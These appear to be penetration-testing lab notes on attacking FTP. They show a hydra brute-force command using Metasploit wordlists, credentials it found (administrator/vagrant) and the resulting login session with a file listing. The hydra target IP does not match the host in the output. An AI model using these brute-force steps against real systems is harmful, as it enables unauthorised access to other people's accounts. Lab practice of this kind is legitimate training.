FTP Exploitation
FTP Brute Force
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.22.85 ftp
[21][ftp] host: 10.0.28.97 login: administrator password: vagrant
Connect via FTP with discovered credentials:
ftp 10.0.28.97 21
root@attackdefense:~/Desktop/Win2k8# ftp 10.0.28.97 21
Connected to 10.0.28.97.
220 Microsoft FTP Service
Name (10.0.28.97:root): administrator
331 Password required for administrator.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49380|)
125 Data connection already open; Transfer starting.
10-28-21 06:22AM <DIR> aspnet_client
10-28-21 06:19AM 28 caidao.asp
10-28-21 06:18AM 34251 hahaha.jpg
10-28-21 06:18AM 1116928 index.html
10-28-21 06:18AM 2439511 seven_of_hearts.html
10-28-21 06:18AM 384916 six_of_diamonds.zip
10-28-21 06:22AM 184946 welcome.png
226 Transfer complete.
ftp>